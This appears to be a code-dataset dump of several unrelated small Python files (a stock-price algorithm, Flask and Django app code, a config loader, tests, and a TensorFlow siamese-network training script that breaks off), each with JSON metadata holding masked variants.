{ "blob_id": "dfae1007adc557a15d03b78f2bf790fb5b06141a", "index": 4442, "step-1": "<mask token>\n", "step-2": "from distributions.zero_inflated_poisson import ZeroInflatedPoisson\nfrom distributions.negative_binomial import NegativeBinomial\nfrom distributions.zero_inflated_negative_binomial import ZeroInflatedNegativeBinomial\nfrom distributions.zero_inflated import ZeroInflated\nfrom distributions.categorized import Categorized\nfrom distributions.pareto import Pareto\n", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
# My solution
def solution(prices):
    # prices: stock prices recorded once per second; return, for each price, how long it did not drop
    answer = [0]*len(prices)

    for i in range(len(prices)-1):
        for j in range(i+1, len(prices)):
            answer[i] += 1
            # the price has dropped
            if prices[i] > prices[j]:
                break

    return answer
normal
{ "blob_id": "23b6d754adf1616bc6ea1f8c74984fbd8dade6dd", "index": 4238, "step-1": "<mask token>\n", "step-2": "def solution(prices):\n answer = [0] * len(prices)\n for i in range(len(prices) - 1):\n for j in range(i + 1, len(prices)):\n answer[i] += 1\n if prices[i] > prices[j]:\n break\n return answer\n", "step-3": "# 나의 풀이\ndef solution(prices):\n # 초 단위로 기록된 주식가격이 담긴 배열 prices # 가격이 떨어지지 않은 기간을 리턴\n answer = [0]*len(prices)\n \n for i in range(len(prices)-1):\n for j in range(i+1, len(prices)):\n answer[i] += 1\n # 가격이 떨어졌을 경우\n if prices[i] > prices[j]:\n break\n\n return answer\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
from setup import app, manager
from Users.controller import user_controller
from Test.controller import test_controller

app.register_blueprint(test_controller, url_prefix="/test") # registering the test_controller blueprint with the main "app" and asking it to handle every URL that begins with "/test". For example: http://127.0.0.1/test/anythingcanbehere/orhere/orhere; all such URLs will go to the test_controller file. For now we have only defined the endpoints "test_get" and "test_post"; anything else will result in a 404 not found error.
app.register_blueprint(user_controller, url_prefix="/")


if __name__ == "__main__":
    app.run(debug=True)
    #manager.run()
normal
{ "blob_id": "afa22db946f77e9b33a443657592c20fbea21eb1", "index": 6146, "step-1": "<mask token>\n", "step-2": "<mask token>\napp.register_blueprint(test_controller, url_prefix='/test')\napp.register_blueprint(user_controller, url_prefix='/')\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-3": "from setup import app, manager\nfrom Users.controller import user_controller\nfrom Test.controller import test_controller\napp.register_blueprint(test_controller, url_prefix='/test')\napp.register_blueprint(user_controller, url_prefix='/')\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-4": "from setup import app, manager\nfrom Users.controller import user_controller\nfrom Test.controller import test_controller\n\napp.register_blueprint(test_controller, url_prefix=\"/test\") #registeting test_controller blueprint with the main \"app\" and asking it to handle all url that begins with \"/test\". For eg: http://127.0.0.1/test/anythingcanbehere/orhere/orhere all such urls will go the test_conrtoller file. For now we just have to defined endpoints \"test_get\", \"test_post\". Anything else will result in 404 not fond error.\napp.register_blueprint(user_controller, url_prefix=\"/\")\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n #manager.run()", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
# Read "<speed> <license plate>" pairs until the sentinel plate A999AA;
# for every entry with speed above 60, add to salary based on repeated plate characters.
speed, lic_plate = input().split()
salary = 0
while lic_plate != "A999AA":
    if int(speed) > 60:
        # three identical characters in positions 1-3 of the plate
        if lic_plate[1] == lic_plate[2] and lic_plate[2] == lic_plate[3]:
            salary += 1000
        # exactly two matching characters
        elif lic_plate[1] == lic_plate[2] or lic_plate[1] == lic_plate[3]:
            salary += 500
        elif lic_plate[2] == lic_plate[3]:
            salary += 500
        else:
            salary += 100
    speed, lic_plate = input().split()
print(salary)
normal
{ "blob_id": "ff8ffeb418bf4f9bc7d5dadd126ebc7c34c5c2cd", "index": 4454, "step-1": "<mask token>\n", "step-2": "<mask token>\nwhile lic_plate != 'A999AA':\n if int(speed) > 60:\n if lic_plate[1] == lic_plate[2] and lic_plate[2] == lic_plate[3]:\n salary += 1000\n elif lic_plate[1] == lic_plate[2] or lic_plate[1] == lic_plate[3]:\n salary += 500\n elif lic_plate[2] == lic_plate[3]:\n salary += 500\n else:\n salary += 100\n speed, lic_plate = input().split()\nprint(salary)\n", "step-3": "speed, lic_plate = input().split()\nsalary = int(0)\nwhile lic_plate != 'A999AA':\n if int(speed) > 60:\n if lic_plate[1] == lic_plate[2] and lic_plate[2] == lic_plate[3]:\n salary += 1000\n elif lic_plate[1] == lic_plate[2] or lic_plate[1] == lic_plate[3]:\n salary += 500\n elif lic_plate[2] == lic_plate[3]:\n salary += 500\n else:\n salary += 100\n speed, lic_plate = input().split()\nprint(salary)\n", "step-4": "speed, lic_plate = input().split()\nsalary = int(0)\nwhile lic_plate != \"A999AA\":\n if int(speed) > 60:\n if lic_plate[1] == lic_plate[2] and lic_plate [2] == lic_plate[3]:\n salary += 1000\n elif lic_plate[1] == lic_plate[2] or lic_plate [1] == lic_plate[3]:\n salary += 500\n elif lic_plate[2] == lic_plate[3]:\n salary += 500\n else:\n salary += 100\n speed, lic_plate = input().split()\nprint(salary)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import os import json basedir = os.path.abspath(os.path.dirname(__file__)) # CHECK IF PRODUCTION CONFIG EXISTS if os.path.exists('/etc/config.json'): with open('/etc/config.json') as config_file: config = json.load(config_file) else: with open('dev_config.json') as config_file: config = json.load(config_file) class Config: SECRET_KEY = config.get('SECRET_KEY') SQLALCHEMY_TRACK_MODIFICATIONS = False MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com') MAIL_PORT = int(config.get('MAIL_PORT', '465')) MAIL_USE_TLS = False MAIL_USE_SSL = True MAIL_USERNAME = config.get('MAIL_USERNAME') MAIL_PASSWORD = config.get('MAIL_PASSWORD') MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX') MAIL_SENDER = config.get('MAIL_SENDER') @staticmethod def init_app(app): pass class DevelopmentConfig(Config): DEBUG = True SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL') or \ 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite') class TestingConfig(Config): TESTING = True SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, '../data-test.sqlite') class ProductionConfig(Config): SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL') config = { 'development': DevelopmentConfig, 'testing': TestingConfig, 'production': ProductionConfig }
normal
{ "blob_id": "1f7147c914eee37776c0418575e93e3d36ee3aa5", "index": 7099, "step-1": "<mask token>\n\n\nclass Config:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'\n ) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,\n '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Config:\n SECRET_KEY = config.get('SECRET_KEY')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')\n MAIL_PORT = int(config.get('MAIL_PORT', '465'))\n MAIL_USE_TLS = False\n MAIL_USE_SSL = True\n MAIL_USERNAME = config.get('MAIL_USERNAME')\n MAIL_PASSWORD = config.get('MAIL_PASSWORD')\n MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')\n MAIL_SENDER = config.get('MAIL_SENDER')\n\n @staticmethod\n def init_app(app):\n pass\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'\n ) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,\n '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\n<mask token>\n", "step-3": "<mask token>\nif os.path.exists('/etc/config.json'):\n with open('/etc/config.json') as config_file:\n config = json.load(config_file)\nelse:\n with open('dev_config.json') as config_file:\n config = json.load(config_file)\n\n\nclass Config:\n SECRET_KEY = config.get('SECRET_KEY')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')\n MAIL_PORT = int(config.get('MAIL_PORT', '465'))\n MAIL_USE_TLS = False\n MAIL_USE_SSL = True\n MAIL_USERNAME = config.get('MAIL_USERNAME')\n MAIL_PASSWORD = config.get('MAIL_PASSWORD')\n MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')\n MAIL_SENDER = config.get('MAIL_SENDER')\n\n @staticmethod\n def init_app(app):\n pass\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'\n ) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,\n '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\n<mask token>\n", "step-4": "<mask token>\nbasedir = os.path.abspath(os.path.dirname(__file__))\nif os.path.exists('/etc/config.json'):\n with open('/etc/config.json') as config_file:\n config = json.load(config_file)\nelse:\n with open('dev_config.json') as config_file:\n config = json.load(config_file)\n\n\nclass Config:\n SECRET_KEY = config.get('SECRET_KEY')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')\n MAIL_PORT = int(config.get('MAIL_PORT', '465'))\n MAIL_USE_TLS = False\n MAIL_USE_SSL = True\n MAIL_USERNAME = config.get('MAIL_USERNAME')\n MAIL_PASSWORD = config.get('MAIL_PASSWORD')\n MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')\n MAIL_SENDER = 
config.get('MAIL_SENDER')\n\n @staticmethod\n def init_app(app):\n pass\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL'\n ) or 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir,\n '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\nconfig = {'development': DevelopmentConfig, 'testing': TestingConfig,\n 'production': ProductionConfig}\n", "step-5": "import os\nimport json\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\n# CHECK IF PRODUCTION CONFIG EXISTS\nif os.path.exists('/etc/config.json'):\n with open('/etc/config.json') as config_file:\n config = json.load(config_file)\nelse:\n with open('dev_config.json') as config_file:\n config = json.load(config_file)\n\n\nclass Config:\n SECRET_KEY = config.get('SECRET_KEY')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n MAIL_SERVER = config.get('MAIL_SERVER', 'smtp.googlemail.com')\n MAIL_PORT = int(config.get('MAIL_PORT', '465'))\n MAIL_USE_TLS = False\n MAIL_USE_SSL = True\n MAIL_USERNAME = config.get('MAIL_USERNAME')\n MAIL_PASSWORD = config.get('MAIL_PASSWORD')\n MAIL_SUBJECT_PREFIX = config.get('MAIL_SUBJECT_PREFIX')\n MAIL_SENDER = config.get('MAIL_SENDER')\n\n @staticmethod\n def init_app(app):\n pass\n\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n SQLALCHEMY_DATABASE_URI = config.get('DEV_DATABASE_URL') or \\\n 'sqlite:///' + os.path.join(basedir, '../data-dev.sqlite')\n\nclass TestingConfig(Config):\n TESTING = True\n SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, '../data-test.sqlite')\n\n\nclass ProductionConfig(Config):\n SQLALCHEMY_DATABASE_URI = config.get('DATABASE_URL')\n\n\nconfig = {\n 'development': DevelopmentConfig,\n 'testing': TestingConfig,\n 'production': ProductionConfig\n}\n", "step-ids": [ 7, 9, 10, 11, 13 ] }
[ 7, 9, 10, 11, 13 ]
# coding=utf-8 # @FileName: test_json.py # @Author: ZhengQiang # Date: 2020/1/15 5:26 下午 import json a = "{\"ddd\": {{}}}" def boyhook(dic): print('test') if dic['name']: return dic['name'], dic['age'] return dic new_boy = json.loads(a, object_hook=boyhook) print(new_boy)
normal
{ "blob_id": "2bc5711839ccbe525551b60211d8cd79ddb7775a", "index": 7019, "step-1": "<mask token>\n\n\ndef boyhook(dic):\n print('test')\n if dic['name']:\n return dic['name'], dic['age']\n return dic\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef boyhook(dic):\n print('test')\n if dic['name']:\n return dic['name'], dic['age']\n return dic\n\n\n<mask token>\nprint(new_boy)\n", "step-3": "<mask token>\na = '{\"ddd\": {{}}}'\n\n\ndef boyhook(dic):\n print('test')\n if dic['name']:\n return dic['name'], dic['age']\n return dic\n\n\nnew_boy = json.loads(a, object_hook=boyhook)\nprint(new_boy)\n", "step-4": "import json\na = '{\"ddd\": {{}}}'\n\n\ndef boyhook(dic):\n print('test')\n if dic['name']:\n return dic['name'], dic['age']\n return dic\n\n\nnew_boy = json.loads(a, object_hook=boyhook)\nprint(new_boy)\n", "step-5": "# coding=utf-8\n# @FileName: test_json.py\n# @Author: ZhengQiang\n# Date: 2020/1/15 5:26 下午\nimport json\na = \"{\\\"ddd\\\": {{}}}\"\n\ndef boyhook(dic):\n print('test')\n if dic['name']:\n return dic['name'], dic['age']\n return dic\n\nnew_boy = json.loads(a, object_hook=boyhook)\nprint(new_boy)", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
from django.shortcuts import render from django.contrib import messages from django.views.generic import View from django.views.decorators.http import require_GET, require_POST from django.shortcuts import render, get_object_or_404 from django.http import HttpResponse,HttpResponsePermanentRedirect,HttpResponseRedirect from django.db.models import Count from .forms import UrlForm from .models import Link import random import string def short_url_gen(stringLength=5): """Generate a random string of fixed length """ letters = string.ascii_letters + string.digits return ''.join(random.choice(letters) for i in range(stringLength)) @require_GET def Follow(request,shorturl): link = get_object_or_404(Link,shorturl=shorturl) link.vi += 1 print(link.vi) link.save() return HttpResponseRedirect(link.link) def FormView(request): toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5] if request.user.is_authenticated: yl = Link.objects.filter(user = request.user) else: yl = None context = { 'form' :UrlForm, 'links':yl, 't':toplink } return render(request, 'shortu.html', context) @require_GET def info(request,shorturl): link = get_object_or_404(Link,shorturl=shorturl) return render(request,'info.html',{'link':link}) @require_POST def Submit(request): form = UrlForm(request.POST) if form.is_valid(): link = form.cleaned_data['url'] costom = form.cleaned_data['costom'] if costom: if Link.objects.filter(shorturl=costom).exists(): #messages(request,"Costom url aready taken") pass else: shorturl = costom newlink = Link.objects.create(link= link,user = request.user, shorturl= shorturl) return render(request,'info.html',{'link':newlink}) j=1 while j<11: newshort = short_url_gen(j) if Link.objects.filter(shorturl=costom).exists(): j+=1 continue newlink = Link.objects.create(link= link, shorturl= newshort,user = request.user) return render(request,'info.html',{'link':newlink}) return render(request, 'home.html')
normal
{ "blob_id": "11952e60ab95bc1896fd899a5ced126dcafec63a", "index": 9882, "step-1": "<mask token>\n\n\n@require_GET\ndef Follow(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user=request.user)\n else:\n yl = None\n context = {'form': UrlForm, 'links': yl, 't': toplink}\n return render(request, 'shortu.html', context)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\n@require_GET\ndef Follow(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user=request.user)\n else:\n yl = None\n context = {'form': UrlForm, 'links': yl, 't': toplink}\n return render(request, 'shortu.html', context)\n\n\n@require_GET\ndef info(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n return render(request, 'info.html', {'link': link})\n\n\n@require_POST\ndef Submit(request):\n form = UrlForm(request.POST)\n if form.is_valid():\n link = form.cleaned_data['url']\n costom = form.cleaned_data['costom']\n if costom:\n if Link.objects.filter(shorturl=costom).exists():\n pass\n else:\n shorturl = costom\n newlink = Link.objects.create(link=link, user=request.user,\n shorturl=shorturl)\n return render(request, 'info.html', {'link': newlink})\n j = 1\n while j < 11:\n newshort = short_url_gen(j)\n if Link.objects.filter(shorturl=costom).exists():\n j += 1\n continue\n newlink = Link.objects.create(link=link, shorturl=newshort,\n user=request.user)\n return render(request, 'info.html', {'link': newlink})\n return render(request, 'home.html')\n", "step-3": "<mask token>\n\n\ndef short_url_gen(stringLength=5):\n \"\"\"Generate a random string of fixed length \"\"\"\n letters = string.ascii_letters + string.digits\n return ''.join(random.choice(letters) for i in range(stringLength))\n\n\n@require_GET\ndef Follow(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user=request.user)\n else:\n yl = None\n context = {'form': UrlForm, 'links': yl, 't': toplink}\n return render(request, 'shortu.html', context)\n\n\n@require_GET\ndef info(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n return render(request, 'info.html', {'link': link})\n\n\n@require_POST\ndef Submit(request):\n form = UrlForm(request.POST)\n if form.is_valid():\n link = form.cleaned_data['url']\n costom = form.cleaned_data['costom']\n if costom:\n if Link.objects.filter(shorturl=costom).exists():\n pass\n else:\n shorturl = costom\n newlink = Link.objects.create(link=link, user=request.user,\n shorturl=shorturl)\n return render(request, 'info.html', {'link': newlink})\n j = 1\n while j < 11:\n newshort = short_url_gen(j)\n if Link.objects.filter(shorturl=costom).exists():\n j += 1\n continue\n newlink = Link.objects.create(link=link, shorturl=newshort,\n user=request.user)\n return render(request, 'info.html', 
{'link': newlink})\n return render(request, 'home.html')\n", "step-4": "from django.shortcuts import render\nfrom django.contrib import messages\nfrom django.views.generic import View\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponsePermanentRedirect, HttpResponseRedirect\nfrom django.db.models import Count\nfrom .forms import UrlForm\nfrom .models import Link\nimport random\nimport string\n\n\ndef short_url_gen(stringLength=5):\n \"\"\"Generate a random string of fixed length \"\"\"\n letters = string.ascii_letters + string.digits\n return ''.join(random.choice(letters) for i in range(stringLength))\n\n\n@require_GET\ndef Follow(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user=request.user)\n else:\n yl = None\n context = {'form': UrlForm, 'links': yl, 't': toplink}\n return render(request, 'shortu.html', context)\n\n\n@require_GET\ndef info(request, shorturl):\n link = get_object_or_404(Link, shorturl=shorturl)\n return render(request, 'info.html', {'link': link})\n\n\n@require_POST\ndef Submit(request):\n form = UrlForm(request.POST)\n if form.is_valid():\n link = form.cleaned_data['url']\n costom = form.cleaned_data['costom']\n if costom:\n if Link.objects.filter(shorturl=costom).exists():\n pass\n else:\n shorturl = costom\n newlink = Link.objects.create(link=link, user=request.user,\n shorturl=shorturl)\n return render(request, 'info.html', {'link': newlink})\n j = 1\n while j < 11:\n newshort = short_url_gen(j)\n if Link.objects.filter(shorturl=costom).exists():\n j += 1\n continue\n newlink = Link.objects.create(link=link, shorturl=newshort,\n user=request.user)\n return render(request, 'info.html', {'link': newlink})\n return render(request, 'home.html')\n", "step-5": "from django.shortcuts import render\nfrom django.contrib import messages\nfrom django.views.generic import View\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse,HttpResponsePermanentRedirect,HttpResponseRedirect\nfrom django.db.models import Count\n\nfrom .forms import UrlForm\nfrom .models import Link\n\nimport random\nimport string\n\ndef short_url_gen(stringLength=5):\n \"\"\"Generate a random string of fixed length \"\"\"\n letters = string.ascii_letters + string.digits\n return ''.join(random.choice(letters) for i in range(stringLength))\n@require_GET\ndef Follow(request,shorturl):\n link = get_object_or_404(Link,shorturl=shorturl)\n link.vi += 1\n print(link.vi)\n link.save()\n return HttpResponseRedirect(link.link)\n\ndef FormView(request):\n toplink = Link.objects.annotate(Count('vi')).order_by('-vi__count')[:5]\n if request.user.is_authenticated:\n yl = Link.objects.filter(user = request.user)\n else:\n yl = None\n context = {\n 'form' :UrlForm,\n 'links':yl,\n 't':toplink\n }\n\n return render(request, 'shortu.html', context)\n@require_GET\ndef info(request,shorturl):\n link = get_object_or_404(Link,shorturl=shorturl)\n return render(request,'info.html',{'link':link})\n\n@require_POST\ndef Submit(request):\n form = UrlForm(request.POST)\n if form.is_valid():\n link = form.cleaned_data['url']\n 
costom = form.cleaned_data['costom']\n if costom:\n if Link.objects.filter(shorturl=costom).exists():\n #messages(request,\"Costom url aready taken\")\n pass\n else: \n shorturl = costom\n newlink = Link.objects.create(link= link,user = request.user, shorturl= shorturl)\n return render(request,'info.html',{'link':newlink})\n j=1\n while j<11:\n newshort = short_url_gen(j)\n if Link.objects.filter(shorturl=costom).exists():\n j+=1\n continue\n newlink = Link.objects.create(link= link, shorturl= newshort,user = request.user)\n return render(request,'info.html',{'link':newlink})\n \n\n return render(request, 'home.html')", "step-ids": [ 2, 4, 5, 6, 7 ] }
[ 2, 4, 5, 6, 7 ]
#!/usr/bin/python from PyMca5.PyMcaGui import PyMcaQt as qt from RixsTool import mainWindow app = qt.QApplication([]) win = mainWindow.RIXSMainWindow() win.show() app.exec_()
normal
{ "blob_id": "34c8541e640596f51a5232cba06172df5814db14", "index": 7734, "step-1": "<mask token>\n", "step-2": "<mask token>\nwin.show()\napp.exec_()\n", "step-3": "<mask token>\napp = qt.QApplication([])\nwin = mainWindow.RIXSMainWindow()\nwin.show()\napp.exec_()\n", "step-4": "from PyMca5.PyMcaGui import PyMcaQt as qt\nfrom RixsTool import mainWindow\napp = qt.QApplication([])\nwin = mainWindow.RIXSMainWindow()\nwin.show()\napp.exec_()\n", "step-5": "#!/usr/bin/python\n\nfrom PyMca5.PyMcaGui import PyMcaQt as qt\nfrom RixsTool import mainWindow\napp = qt.QApplication([])\nwin = mainWindow.RIXSMainWindow()\nwin.show()\napp.exec_()\n ", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# Generated by Django 3.0.4 on 2021-03-27 19:18 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('electra', '0009_remove_response_img'), ] operations = [ migrations.AddField( model_name='response', name='date_time', field=models.DateTimeField(auto_now_add=True, null=True), ), ]
normal
{ "blob_id": "049d83bc1a31ef170654fda47d1f58e024befb44", "index": 8220, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('electra', '0009_remove_response_img')]\n operations = [migrations.AddField(model_name='response', name=\n 'date_time', field=models.DateTimeField(auto_now_add=True, null=True))]\n", "step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('electra', '0009_remove_response_img')]\n operations = [migrations.AddField(model_name='response', name=\n 'date_time', field=models.DateTimeField(auto_now_add=True, null=True))]\n", "step-5": "# Generated by Django 3.0.4 on 2021-03-27 19:18\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('electra', '0009_remove_response_img'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='response',\n name='date_time',\n field=models.DateTimeField(auto_now_add=True, null=True),\n ),\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
"""Test Spotify module""" from spoetify.spotify import Spotify from nose.tools import assert_equal def test_search_track(): sp = Spotify() t = sp.search_track("avocado") assert_equal(t.id, "1UyzA43l3OIcJ6jd3hh3ac")
normal
{ "blob_id": "337309da79ce9d90010fef5c171b6b344e6dc63f", "index": 5937, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef test_search_track():\n sp = Spotify()\n t = sp.search_track('avocado')\n assert_equal(t.id, '1UyzA43l3OIcJ6jd3hh3ac')\n", "step-3": "<mask token>\nfrom spoetify.spotify import Spotify\nfrom nose.tools import assert_equal\n\n\ndef test_search_track():\n sp = Spotify()\n t = sp.search_track('avocado')\n assert_equal(t.id, '1UyzA43l3OIcJ6jd3hh3ac')\n", "step-4": "\"\"\"Test Spotify module\"\"\"\nfrom spoetify.spotify import Spotify\nfrom nose.tools import assert_equal\n\n\ndef test_search_track():\n sp = Spotify()\n t = sp.search_track(\"avocado\")\n assert_equal(t.id, \"1UyzA43l3OIcJ6jd3hh3ac\")\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import tensorflow as tf from tensorflow.python.framework import graph_util from net import siameseNet_batchnorm as siameseNet import dataset import numpy as np import cv2 import os batch_size=64 input_height=32 input_width=32 total_epoch_num=50 snapshot=100 support_image_extensions=[".jpg",".png",".jpeg",".bmp"] margin=1.0 channals=3 train_image_root="D:/forTensorflow/charRecTrain/forMyDNNCode/train" test_image_root="D:/forTensorflow/charRecTrain/forMyDNNCode/test" model_path="models/" pb_path=os.path.join(model_path,"pb/") ckpt_path=os.path.join(model_path,"ckpt/") if not os.path.exists(pb_path): os.makedirs(pb_path) if not os.path.exists(ckpt_path): os.makedirs(ckpt_path) model_name="siamese_triplet_28out_allloss_bn" if __name__ == '__main__': # image_paths,labels=get_images_path(test_image_root) # data=next_batch(True,None,image_paths,labels) # for left,right,label in zip(*data): # cv2.imshow("left",left) # cv2.imshow("right", right) # print(label) # cv2.waitKey(0) first_shape=None anchor_placeholder = tf.placeholder(tf.float32,shape=[first_shape,input_height,input_width,channals],name="anchor") similar_placeholder = tf.placeholder(tf.float32, shape=[first_shape, input_height, input_width, channals], name="similar") dissimilar_placeholder = tf.placeholder(tf.float32, shape=[first_shape, input_height, input_width, channals], name="dissimilar") labels_placeholder = tf.placeholder(tf.float32, shape= [None if first_shape is None else first_shape * 3, ], name="labels") is_training_placeholder = tf.placeholder_with_default(False, shape=(), name="is_training") siamese_net=siameseNet.siameseNet() anchor = siamese_net.inference(anchor_placeholder,reuse=False,is_training=is_training_placeholder) similar = siamese_net.inference(similar_placeholder,reuse=True,is_training=is_training_placeholder) dissimilar = siamese_net.inference(dissimilar_placeholder,reuse=True,is_training=is_training_placeholder) loss,pos_dist,neg_dist = siamese_net.loss(anchor,similar,dissimilar,labels_placeholder,margin) flatten_out_anchor = tf.identity(anchor, name="flatten_anchor") flatten_out_similar = tf.identity(similar, name="flatten_similar") flatten_out_dissimilar = tf.identity(dissimilar, name="flatten_dissimilar") update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) global_step = tf.Variable(0, trainable=False) # learning_rate = tf.train.exponential_decay(0.01, global_step, 100, 0.9) # optimizer = tf.train.MomentumOptimizer(learning_rate, 0.9) with tf.control_dependencies([tf.group(*update_ops)]): # train_step = optimizer.minimize(loss, global_step) train_step = tf.train.MomentumOptimizer(0.01, 0.90).\ minimize(loss, global_step=global_step) var_list = tf.trainable_variables() if global_step is not None: var_list.append(global_step) g_list = tf.global_variables() # 从全局变量中获得batch norm的缩放和偏差 bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name] bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name] var_list += bn_moving_vars ckpt_saver = tf.train.Saver() train_dataset = dataset.dataset(train_image_root,batch_size,support_image_extensions, input_height,input_width,channals) test_dataset = dataset.dataset(test_image_root, batch_size, support_image_extensions, input_height, input_width, channals) with tf.Session() as sess: sess.run(tf.global_variables_initializer()) # if os.path.exists(os.path.join(ckpt_path, "checkpoint")): # ckpt_saver.restore(sess, tf.train.latest_checkpoint(ckpt_path)) total_iters_num = 0 for epoch_num in range(total_epoch_num): train_images_num = train_dataset.sample_len 
